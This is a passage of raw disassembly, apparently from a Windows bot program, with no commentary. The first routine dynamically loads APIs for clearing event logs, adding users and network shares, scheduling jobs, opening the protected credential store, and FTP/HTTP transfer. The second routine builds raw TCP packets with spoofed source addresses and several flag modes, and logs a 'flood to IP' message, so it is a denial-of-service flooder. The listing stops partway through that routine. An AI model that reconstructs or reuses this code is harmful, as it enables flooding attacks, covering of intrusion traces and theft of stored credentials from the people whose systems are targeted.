mov dword_45426C, eax
jz short loc_40BFDE
cmp dword_4541D4, ebx
jz short loc_40BFDE
cmp dword_4541DC, ebx
jz short loc_40BFDE
cmp dword_454244, ebx
jz short loc_40BFDE
cmp dword_454250, ebx
jz short loc_40BFDE
cmp dword_4541F0, ebx
jz short loc_40BFDE
cmp dword_4542C8, ebx
jz short loc_40BFDE
cmp dword_4541E0, ebx
jz short loc_40BFDE
cmp dword_4543C8, ebx
jz short loc_40BFDE
cmp dword_454208, ebx
jz short loc_40BFDE
cmp dword_454284, ebx
jz short loc_40BFDE
cmp dword_4543CC, ebx
jz short loc_40BFDE
cmp dword_45432C, ebx
jz short loc_40BFDE
cmp dword_454328, ebx
jz short loc_40BFDE
cmp eax, ebx
jnz short loc_40BFE8
loc_40BFDE: ; CODE XREF: sub_40BB43+42D�j
; sub_40BB43+435�j ...
mov dword_4543E8, 1
loc_40BFE8: ; CODE XREF: sub_40BB43+499�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; dword_42F13C
cmp eax, ebx
mov dword_4541D8, eax
jnz short loc_40C003
mov dword_4543E8, 1
loc_40C003: ; CODE XREF: sub_40BB43+4B4�j
push offset aCleareventloga ; "ClearEventLogA"
push edi
call esi ; dword_42F13C
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov dword_454290, eax
call esi ; dword_42F13C
push offset aCloseeventlog ; "CloseEventLog"
push edi
mov dword_454288, eax
call esi ; dword_42F13C
cmp dword_454290, ebx
mov dword_45424C, eax
jz short loc_40C04B
cmp dword_454288, ebx
jz short loc_40C04B
cmp eax, ebx
jnz short loc_40C055
jmp short loc_40C04B
; ---------------------------------------------------------------------------
loc_40C040: ; CODE XREF: sub_40BB43+21A�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_4543F0, eax
loc_40C04B: ; CODE XREF: sub_40BB43+4ED�j
; sub_40BB43+4F5�j ...
mov dword_4543E8, 1
loc_40C055: ; CODE XREF: sub_40BB43+4F9�j
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz loc_40C31C
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; dword_42F13C
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_454274, eax
call esi ; dword_42F13C
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_4543B8, eax
call esi ; dword_42F13C
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_454210, eax
call esi ; dword_42F13C
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4541E4, eax
call esi ; dword_42F13C
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4542B0, eax
call esi ; dword_42F13C
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_454294, eax
call esi ; dword_42F13C
push offset aSocket ; "socket"
push edi
mov dword_454258, eax
call esi ; dword_42F13C
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_454394, eax
call esi ; dword_42F13C
push offset aConnect ; "connect"
push edi
mov dword_4543B0, eax
call esi ; dword_42F13C
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4542AC, eax
call esi ; dword_42F13C
push offset aInet_addr ; "inet_addr"
push edi
mov dword_45439C, eax
call esi ; dword_42F13C
push offset aHtons ; "htons"
push edi
mov dword_45434C, eax
call esi ; dword_42F13C
push offset aHtonl ; "htonl"
push edi
mov dword_454314, eax
call esi ; dword_42F13C
push offset aNtohs ; "ntohs"
push edi
mov dword_454310, eax
call esi ; dword_42F13C
push offset aNtohl ; "ntohl"
push edi
mov dword_454230, eax
call esi ; dword_42F13C
push offset aSend ; "send"
push edi
mov dword_454228, eax
call esi ; dword_42F13C
push offset aSendto ; "sendto"
push edi
mov dword_454350, eax
call esi ; dword_42F13C
push offset aRecv ; "recv"
push edi
mov dword_454370, eax
call esi ; dword_42F13C
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_454330, eax
call esi ; dword_42F13C
mov dword_4542E4, eax
push offset aBind ; "bind"
push edi
call esi ; dword_42F13C
push offset aSelect ; "select"
push edi
mov dword_454344, eax
call esi ; dword_42F13C
push offset aListen ; "listen"
push edi
mov dword_4542FC, eax
call esi ; dword_42F13C
push offset aAccept ; "accept"
push edi
mov dword_454340, eax
call esi ; dword_42F13C
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4543A4, eax
call esi ; dword_42F13C
push offset aGetsockname ; "getsockname"
push edi
mov dword_4542F0, eax
call esi ; dword_42F13C
push offset aGethostname ; "gethostname"
push edi
mov dword_4542A8, eax
call esi ; dword_42F13C
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_454324, eax
call esi ; dword_42F13C
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_454398, eax
call esi ; dword_42F13C
push offset aGetpeername ; "getpeername"
push edi
mov dword_4542C0, eax
call esi ; dword_42F13C
push offset aClosesocket ; "closesocket"
push edi
mov dword_454254, eax
call esi ; dword_42F13C
push offset aShutdown ; "shutdown"
push edi
mov dword_4543AC, eax
call esi ; dword_42F13C
cmp dword_454274, ebx
mov dword_4543A8, eax
jz loc_40C327
cmp dword_4543B8, ebx
jz loc_40C327
cmp dword_454210, ebx
jz loc_40C327
cmp dword_4542B0, ebx
jz loc_40C327
cmp dword_454294, ebx
jz loc_40C327
cmp dword_454258, ebx
jz loc_40C327
cmp dword_454394, ebx
jz loc_40C327
cmp dword_4543B0, ebx
jz loc_40C327
cmp dword_4542AC, ebx
jz loc_40C327
cmp dword_45439C, ebx
jz loc_40C327
cmp dword_45434C, ebx
jz loc_40C327
cmp dword_454314, ebx
jz loc_40C327
cmp dword_454310, ebx
jz loc_40C327
cmp dword_454230, ebx
jz short loc_40C327
cmp dword_454350, ebx
jz short loc_40C327
cmp dword_454370, ebx
jz short loc_40C327
cmp dword_454330, ebx
jz short loc_40C327
cmp dword_4542E4, ebx
jz short loc_40C327
cmp dword_454344, ebx
jz short loc_40C327
cmp dword_4542FC, ebx
jz short loc_40C327
cmp dword_454340, ebx
jz short loc_40C327
cmp dword_4543A4, ebx
jz short loc_40C327
cmp dword_4542F0, ebx
jz short loc_40C327
cmp dword_4542A8, ebx
jz short loc_40C327
cmp dword_454324, ebx
jz short loc_40C327
cmp dword_454398, ebx
jz short loc_40C327
cmp dword_4542C0, ebx
jz short loc_40C327
cmp dword_4543AC, ebx
jnz short loc_40C331
jmp short loc_40C327
; ---------------------------------------------------------------------------
loc_40C31C: ; CODE XREF: sub_40BB43+51D�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_4543F8, eax
loc_40C327: ; CODE XREF: sub_40BB43+6C9�j
; sub_40BB43+6D5�j ...
mov dword_4543F4, 1
loc_40C331: ; CODE XREF: sub_40BB43+7D5�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz loc_40C450
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; dword_42F13C
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_454238, eax
call esi ; dword_42F13C
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4541C4, eax
call esi ; dword_42F13C
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4542D4, eax
call esi ; dword_42F13C
push offset aFtpgetfilea ; "FtpGetFileA"
push edi
mov dword_454278, eax
call esi ; dword_42F13C
push offset aFtpputfilea ; "FtpPutFileA"
push edi
mov dword_45421C, eax
call esi ; dword_42F13C
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_454380, eax
call esi ; dword_42F13C
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_4542E0, eax
call esi ; dword_42F13C
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_454298, eax
call esi ; dword_42F13C
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4541FC, eax
call esi ; dword_42F13C
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_4541F4, eax
call esi ; dword_42F13C
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_454204, eax
call esi ; dword_42F13C
cmp dword_454238, ebx
mov ecx, dword_454298
mov dword_454348, eax
jz short loc_40C42C
cmp dword_4541C4, ebx
jz short loc_40C42C
cmp dword_4542D4, ebx
jz short loc_40C42C
cmp dword_454278, ebx
jz short loc_40C42C
cmp dword_4542E0, ebx
jz short loc_40C42C
cmp ecx, ebx
jz short loc_40C42C
cmp dword_4541FC, ebx
jz short loc_40C42C
cmp dword_4541F4, ebx
jz short loc_40C42C
cmp dword_454204, ebx
jz short loc_40C42C
cmp eax, ebx
jnz short loc_40C436
loc_40C42C: ; CODE XREF: sub_40BB43+8A7�j
; sub_40BB43+8AF�j ...
mov dword_4543FC, 1
loc_40C436: ; CODE XREF: sub_40BB43+8E7�j
cmp ecx, ebx
jz short loc_40C46B
push ebx
push ebx
push ebx
push ebx
push offset aMozilla5_0Comp ; "Mozilla/5.0 (compatible)"
call ecx ; dword_454298
cmp eax, ebx
mov dword_4542B8, eax
jnz short loc_40C46B
jmp short loc_40C465
; ---------------------------------------------------------------------------
loc_40C450: ; CODE XREF: sub_40BB43+7F9�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_454400, eax
mov dword_4543FC, 1
loc_40C465: ; CODE XREF: sub_40BB43+90B�j
mov dword_4542B8, ebx
loc_40C46B: ; CODE XREF: sub_40BB43+8F5�j
; sub_40BB43+909�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz loc_40C561
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; dword_42F13C
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4541EC, eax
call esi ; dword_42F13C
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4541CC, eax
call esi ; dword_42F13C
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_454240, eax
call esi ; dword_42F13C
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_454280, eax
call esi ; dword_42F13C
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4543A0, eax
call esi ; dword_42F13C
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_45422C, eax
call esi ; dword_42F13C
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4541D0, eax
call esi ; dword_42F13C
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4541C8, eax
call esi ; dword_42F13C
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_45425C, eax
call esi ; dword_42F13C
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_45435C, eax
call esi ; dword_42F13C
cmp dword_4541EC, ebx
mov dword_454320, eax
jz short loc_40C56C
cmp dword_4541CC, ebx
jz short loc_40C56C
cmp dword_454240, ebx
jz short loc_40C56C
cmp dword_454280, ebx
jz short loc_40C56C
cmp dword_4543A0, ebx
jz short loc_40C56C
cmp dword_45422C, ebx
jz short loc_40C56C
cmp dword_4541D0, ebx
jz short loc_40C56C
cmp dword_4541C8, ebx
jz short loc_40C56C
cmp dword_45425C, ebx
jz short loc_40C56C
cmp dword_45435C, ebx
jz short loc_40C56C
cmp eax, ebx
jnz short loc_40C576
jmp short loc_40C56C
; ---------------------------------------------------------------------------
loc_40C561: ; CODE XREF: sub_40BB43+933�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_454408, eax
loc_40C56C: ; CODE XREF: sub_40BB43+9CE�j
; sub_40BB43+9D6�j ...
mov dword_454404, 1
loc_40C576: ; CODE XREF: sub_40BB43+A1A�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz short loc_40C5AB
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; dword_42F13C
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_454218, eax
call esi ; dword_42F13C
cmp dword_454218, ebx
mov dword_454308, eax
jz short loc_40C5B6
cmp eax, ebx
jnz short loc_40C5C0
jmp short loc_40C5B6
; ---------------------------------------------------------------------------
loc_40C5AB: ; CODE XREF: sub_40BB43+A3E�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_454410, eax
loc_40C5B6: ; CODE XREF: sub_40BB43+A60�j
; sub_40BB43+A66�j
mov dword_45440C, 1
loc_40C5C0: ; CODE XREF: sub_40BB43+A64�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz loc_40C653
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; dword_42F13C
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_454390, eax
call esi ; dword_42F13C
push offset aGetiftable ; "GetIfTable"
push edi
mov dword_45438C, eax
call esi ; dword_42F13C
push offset aGettcptable ; "GetTcpTable"
push edi
mov dword_4542DC, eax
call esi ; dword_42F13C
push offset aGetudptable ; "GetUdpTable"
push edi
mov dword_4542F4, eax
call esi ; dword_42F13C
cmp dword_454390, ebx
mov dword_454368, eax
jz short loc_40C636
cmp dword_45438C, ebx
jz short loc_40C636
cmp dword_4542DC, ebx
jz short loc_40C636
cmp eax, ebx
jz short loc_40C636
cmp dword_4542F4, ebx
jnz short loc_40C640
loc_40C636: ; CODE XREF: sub_40BB43+AD5�j
; sub_40BB43+ADD�j ...
mov dword_454414, 1
loc_40C640: ; CODE XREF: sub_40BB43+AF1�j
push offset aGetnetworkpara ; "GetNetworkParams"
push edi
call esi ; dword_42F13C
cmp eax, ebx
mov dword_4542A4, eax
jnz short loc_40C668
jmp short loc_40C65E
; ---------------------------------------------------------------------------
loc_40C653: ; CODE XREF: sub_40BB43+A88�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_45441C, eax
loc_40C65E: ; CODE XREF: sub_40BB43+B0E�j
mov dword_454414, 1
loc_40C668: ; CODE XREF: sub_40BB43+B0C�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz short loc_40C6C7
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; dword_42F13C
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_4543BC, eax
call esi ; dword_42F13C
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4543B4, eax
call esi ; dword_42F13C
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_454374, eax
call esi ; dword_42F13C
cmp dword_4543BC, ebx
mov dword_454234, eax
jz short loc_40C6D2
cmp dword_4543B4, ebx
jz short loc_40C6D2
cmp dword_454374, ebx
jz short loc_40C6D2
cmp eax, ebx
jnz short loc_40C6DC
jmp short loc_40C6D2
; ---------------------------------------------------------------------------
loc_40C6C7: ; CODE XREF: sub_40BB43+B30�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_454424, eax
loc_40C6D2: ; CODE XREF: sub_40BB43+B6C�j
; sub_40BB43+B74�j ...
mov dword_454420, 1
loc_40C6DC: ; CODE XREF: sub_40BB43+B80�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz short loc_40C711
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; dword_42F13C
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_454270, eax
call esi ; dword_42F13C
cmp dword_454270, ebx
mov dword_454388, eax
jz short loc_40C71C
cmp eax, ebx
jnz short loc_40C726
jmp short loc_40C71C
; ---------------------------------------------------------------------------
loc_40C711: ; CODE XREF: sub_40BB43+BA4�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_45442C, eax
loc_40C71C: ; CODE XREF: sub_40BB43+BC6�j
; sub_40BB43+BCC�j
mov dword_454428, 1
loc_40C726: ; CODE XREF: sub_40BB43+BCA�j
push offset aPsapi_dll ; "psapi.dll"
call ebp ; dword_42F138
mov edi, eax
cmp edi, ebx
jz short loc_40C79B
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push edi
call esi ; dword_42F13C
push offset aGetmodulebasen ; "GetModuleBaseNameA"
push edi
mov dword_4542CC, eax
call esi ; dword_42F13C
push offset aEnumprocessmod ; "EnumProcessModules"
push edi
mov dword_454224, eax
call esi ; dword_42F13C
push offset aEnumprocesses ; "EnumProcesses"
push edi
mov dword_4542D0, eax
call esi ; dword_42F13C
push offset aGetprocessmemo ; "GetProcessMemoryInfo"
push edi
mov dword_45430C, eax
call esi ; dword_42F13C
cmp dword_454224, ebx
mov dword_454364, eax
jz short loc_40C790
cmp dword_4542D0, ebx
jz short loc_40C790
cmp dword_45430C, ebx
jz short loc_40C790
cmp eax, ebx
jnz short loc_40C7B0
loc_40C790: ; CODE XREF: sub_40BB43+C37�j
; sub_40BB43+C3F�j ...
xor edi, edi
inc edi
mov dword_454430, edi
jmp short loc_40C7B3
; ---------------------------------------------------------------------------
loc_40C79B: ; CODE XREF: sub_40BB43+BEE�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_454434, eax
mov dword_454430, 1
loc_40C7B0: ; CODE XREF: sub_40BB43+C4B�j
xor edi, edi
inc edi
loc_40C7B3: ; CODE XREF: sub_40BB43+C56�j
push offset aPstorec_dll ; "pstorec.dll"
call ebp ; dword_42F138
cmp eax, ebx
jz short loc_40C7D1
push offset aPstorecreatein ; "PStoreCreateInstance"
push eax
call esi ; dword_42F13C
cmp eax, ebx
mov dword_4542EC, eax
jnz short loc_40C7E2
jmp short loc_40C7DC
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40BB43+C79�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_45443C, eax
loc_40C7DC: ; CODE XREF: sub_40BB43+C8C�j
mov dword_454438, edi
loc_40C7E2: ; CODE XREF: sub_40BB43+C8A�j
push offset aUserenv_dll ; "userenv.dll"
call ebp ; dword_42F138
cmp eax, ebx
jz short loc_40C800
push offset aGetuserprofile ; "GetUserProfileDirectoryA"
push eax
call esi ; dword_42F13C
cmp eax, ebx
mov dword_454334, eax
jnz short loc_40C811
jmp short loc_40C80B
; ---------------------------------------------------------------------------
loc_40C800: ; CODE XREF: sub_40BB43+CA8�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_454444, eax
loc_40C80B: ; CODE XREF: sub_40BB43+CBB�j
mov dword_454440, edi
loc_40C811: ; CODE XREF: sub_40BB43+CB9�j
push offset aShlwapi_dll ; "shlwapi.dll"
call ebp ; dword_42F138
cmp eax, ebx
pop ebp
jz short loc_40C830
push offset aPathremovefile ; "PathRemoveFileSpecA"
push eax
call esi ; dword_42F13C
cmp eax, ebx
mov dword_45429C, eax
jnz short loc_40C841
jmp short loc_40C83B
; ---------------------------------------------------------------------------
loc_40C830: ; CODE XREF: sub_40BB43+CD8�j
call dword_42F068 ; RtlGetLastWin32Error
mov dword_45444C, eax
loc_40C83B: ; CODE XREF: sub_40BB43+CEB�j
mov dword_454448, edi
loc_40C841: ; CODE XREF: sub_40BB43+CE9�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_40BB43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C847 proc near ; DATA XREF: sub_403B2C+6A38�o
var_268 = dword ptr -268h
var_260 = byte ptr -260h
var_1E0 = byte ptr -1E0h
var_160 = byte ptr -160h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_B6 = word ptr -0B6h
var_9C = byte ptr -9Ch
var_9B = byte ptr -9Bh
var_88 = byte ptr -88h
var_78 = byte ptr -78h
var_70 = byte ptr -70h
var_60 = word ptr -60h
var_5E = word ptr -5Eh
var_5C = dword ptr -5Ch
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = byte ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 268h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_268]
rep movsd
push 0Eh
mov dword ptr [eax+1A4h], 1
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_9B]
mov [ebp+var_9C], bl
mov esi, [ebp+var_268]
rep stosd
stosw
stosb
mov edi, dword_42F164
mov [ebp+var_2C], esi
mov [ebp+var_4C], 17h
mov [ebp+var_4A], 35h
mov [ebp+var_48], 50h
mov [ebp+var_46], 8Bh
mov [ebp+var_44], 0B3h
mov [ebp+var_42], 0CEAh
call edi ; dword_42F164
push eax
call sub_4220EF
pop ecx
push 0FFh
push 3
push 2
call dword_454394 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
jnz short loc_40C8DB
push eax
jmp short loc_40C90C
; ---------------------------------------------------------------------------
loc_40C8DB: ; CODE XREF: sub_40C847+8F�j
lea ecx, [ebp+var_50]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_50], 1
call dword_4542F0 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_40C909
lea eax, [ebp+var_260]
push eax
call dword_45434C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_40C941
loc_40C909: ; CODE XREF: sub_40C847+AE�j
push [ebp+var_1C]
loc_40C90C: ; CODE XREF: sub_40C847+92�j
call dword_42F298 ; closesocket
push [ebp+var_E0]
call sub_41C059
pop ecx
mov edi, offset dword_439638
push edi
mov ecx, esi
call sub_41074B
push offset dword_43963C
push edi
mov ecx, esi
call sub_410720
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40C941: ; CODE XREF: sub_40C847+C0�j
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_40C972
push offset aStopped_ ; "Stopped."
push 8
push ebx
push ebx
push [ebp+var_CC]
lea eax, [ebp+var_160]
push [ebp+var_C8]
push esi
push eax
call sub_41C090
add esp, 20h
loc_40C972: ; CODE XREF: sub_40C847+104�j
push offset dword_4552D0
call dword_42F274 ; gethostbyname
mov eax, [eax+0Ch]
push 10h
push ebx
mov eax, [eax]
mov esi, [eax]
lea eax, [ebp+var_60]
push eax
call sub_4221F0
add esp, 0Ch
mov [ebp+var_60], 2
push ebx
call dword_454314 ; ntohs
mov [ebp+var_5E], ax
lea eax, [ebp+var_260]
push eax
call dword_45434C ; inet_addr
mov [ebp+var_5C], eax
mov [ebp+arg_0], ebx
call edi ; dword_42F164
mov [ebp+var_24], eax
call edi ; dword_42F164
sub eax, [ebp+var_24]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_D8]
jbe loc_40CA9D
loc_40C9D6: ; CODE XREF: sub_40C847+57A�j
push [ebp+var_1C]
call dword_4543AC ; closesocket
cmp [ebp+var_C8], ebx
jnz loc_40CA87
cmp [ebp+var_CC], ebx
mov esi, offset a8sxng_tdfrt ; "8sXNG.tDfrt/"
mov edi, offset aSDoneWithSFloo ; "%s Done with %s flood to IP: %s. Sent: "...
jnz short loc_40CA4A
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_D8]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_260]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1E0]
push eax
push esi
lea eax, [ebp+var_160]
push edi
push eax
push [ebp+var_2C]
call sub_4104F6
add esp, 24h
cmp [ebp+var_C8], ebx
jnz short loc_40CA87
cmp [ebp+var_CC], ebx
jz short loc_40CA87
loc_40CA4A: ; CODE XREF: sub_40C847+1B4�j
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_D8]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_260]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1E0]
push eax
push esi
lea eax, [ebp+var_160]
push edi
push eax
push [ebp+var_2C]
call sub_410491
add esp, 24h
loc_40CA87: ; CODE XREF: sub_40C847+19E�j
; sub_40C847+1F9�j ...
push [ebp+var_E0]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
loc_40CA9A: ; CODE XREF: sub_40C847+574�j
mov esi, [ebp+var_28]
loc_40CA9D: ; CODE XREF: sub_40C847+189�j
call sub_4220FC
cdq
mov ecx, 0FFh
and esi, 0FFFFFFh
idiv ecx
push 2Ch
mov [ebp+var_40], 45h
shl edx, 18h
or edx, esi
mov [ebp+var_28], edx
call dword_454314 ; ntohs
or [ebp+var_38], 0FFh
xor esi, esi
inc esi
cmp [ebp+var_D0], ebx
mov [ebp+var_3E], ax
mov [ebp+var_3C], si
mov [ebp+var_3A], bx
mov [ebp+var_37], 6
mov [ebp+var_36], bx
jz short loc_40CAEC
mov eax, [ebp+var_28]
jmp short loc_40CAF7
; ---------------------------------------------------------------------------
loc_40CAEC: ; CODE XREF: sub_40C847+29E�j
push offset dword_4552D0
call dword_45434C ; inet_addr
loc_40CAF7: ; CODE XREF: sub_40C847+2A3�j
cmp [ebp+var_DC], ebx
mov [ebp+var_34], eax
mov eax, [ebp+var_5C]
mov [ebp+var_30], eax
jnz short loc_40CB18
call sub_4220FC
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_40CB1E
; ---------------------------------------------------------------------------
loc_40CB18: ; CODE XREF: sub_40C847+2BF�j
push [ebp+var_DC]
loc_40CB1E: ; CODE XREF: sub_40C847+2CF�j
call dword_454314 ; ntohs
mov [ebp+var_16], ax
call sub_4220FC
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_454314 ; ntohs
push 12345678h
mov [ebp+var_18], ax
call dword_454310 ; ntohl
mov [ebp+var_14], eax
lea eax, [ebp+var_1E0]
push offset aWy ; "wy"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_40CB71
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp loc_40CCA1
; ---------------------------------------------------------------------------
loc_40CB71: ; CODE XREF: sub_40C847+31C�j
lea eax, [ebp+var_1E0]
push offset aWak ; "wak"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_40CB94
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp loc_40CCA1
; ---------------------------------------------------------------------------
loc_40CB94: ; CODE XREF: sub_40C847+33F�j
lea eax, [ebp+var_1E0]
push offset aRst ; "rst"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_40CBB7
mov [ebp+var_10], esi
mov [ebp+var_B], 4
jmp loc_40CCA1
; ---------------------------------------------------------------------------
loc_40CBB7: ; CODE XREF: sub_40C847+362�j
lea eax, [ebp+var_1E0]
push offset aWon ; "won"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz loc_40CC64
mov [ebp+var_20], ebx
loc_40CBD5: ; CODE XREF: sub_40C847+415�j
call sub_4220FC
push 6
cdq
pop ecx
idiv ecx
mov ax, [ebp+edx*2+var_4C]
push eax
call dword_454314 ; ntohs
cmp [ebp+var_20], ebx
mov [ebp+var_16], ax
jnz short loc_40CC06
and [ebp+var_4], 0EFh
and [ebp+var_4], 0EFh
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_40CC52
; ---------------------------------------------------------------------------
loc_40CC06: ; CODE XREF: sub_40C847+3AC�j
push 0FFFFh
push ebx
mov [ebp+var_10], esi
mov [ebp+var_B], 4
call sub_41409E
pop ecx
pop ecx
push eax
call dword_454314 ; ntohs
shl al, 4
xor al, [ebp+var_4]
push 0FFFFh
push ebx
mov [ebp+var_10], esi
and al, 10h
mov [ebp+var_B], 4
xor [ebp+var_4], al
call sub_41409E
pop ecx
pop ecx
push eax
call dword_454314 ; ntohs
shl al, 4
xor al, [ebp+var_4]
and al, 10h
xor [ebp+var_4], al
loc_40CC52: ; CODE XREF: sub_40C847+3BD�j
inc [ebp+var_20]
cmp [ebp+var_20], 3FFh
jl loc_40CBD5
jmp short loc_40CCA1
; ---------------------------------------------------------------------------
loc_40CC64: ; CODE XREF: sub_40C847+385�j
lea eax, [ebp+var_1E0]
push offset aRa_0 ; "ra"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_40CCA1
call sub_4220FC
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_4220FC
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0E4h
add dl, 20h
mov [ebp+var_B], dl
loc_40CCA1: ; CODE XREF: sub_40C847+325�j
; sub_40C847+348�j ...
push 1E61h
mov [ebp+var_C], 60h
call dword_454314 ; ntohs
mov [ebp+var_A], ax
mov eax, [ebp+var_34]
